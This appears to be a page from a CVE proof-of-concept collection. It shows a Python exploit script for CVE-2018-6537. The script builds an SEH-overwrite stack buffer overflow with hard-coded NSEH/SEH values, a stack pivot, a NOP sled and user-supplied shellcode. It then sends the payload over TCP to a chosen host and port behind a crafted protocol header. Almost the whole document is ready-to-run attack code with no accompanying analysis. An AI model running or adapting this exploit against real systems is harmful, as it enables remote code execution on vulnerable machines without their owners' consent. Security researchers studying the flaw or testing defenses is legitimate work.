4837 Total CVEs
26 Years
GitHub
Home / 2018 / CVE-2018-6537
README.md
README.md not found for CVE-2018-6537. The file may not exist in the repository.
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
from argparse import ArgumentParser
from socket   import socket, AF_INET, SOCK_STREAM
from struct   import pack

class Exploit:

    def __init__(self) -> None:
        
        parser = ArgumentParser()
        for arg in ("host", "port", "file"):
            
            parser.add_argument(
                f"--{arg}",
                action   = "store", 
                required = True
                )
            
        args = parser.parse_args()
        self.port = int(args.port)
        self.host = args.host
        self.file = args.file

    def make(self, buf: bytes) -> bytes:

        # prefix nops for stack interactions
        buf  = b'\x90' * 16 + buf
        buf += b'\x41' * (400 - len(buf))

        # bytecode
        buffer  = b'\x41' * 124
        buffer += pack("<I", 0x06eb9090) # NSEH
        buffer += pack("<I", 0x1015a2f0) # SEH
        buffer += b'\x90' * 2
        buffer += b"\x66\x81\xc4\x70\x0e"
        buffer += b"\xff\xe4"
        buffer += b'\x90' * (1000 - len(buffer) - len(buf))
        buffer += buf

        return buffer

    def send(self, buffer: bytes) -> None:
        
        # program header (prefixed)
        header  = b"\x75\x19\xba\xab"
        header += b"\x03\x00\x00\x00"
        header += b"\x00\x40\x00\x00"
        header += pack('<I', len(buffer))
        header += pack('<I', len(buffer))
        header += pack('<I', buffer[-1])

        with socket(AF_INET, SOCK_STREAM) as sock:

            try:
                sock.connect((self.host, self.port))
                sock.send(header + buffer)
            except Exception as e:
                print(f"couldn't connect: {e}")

    def main(self) -> None:
   
        with open(self.file, 'rb') as file: 
            self.send(self.make(file.read()))

if __name__ == "__main__":
    (_ := Exploit()).main()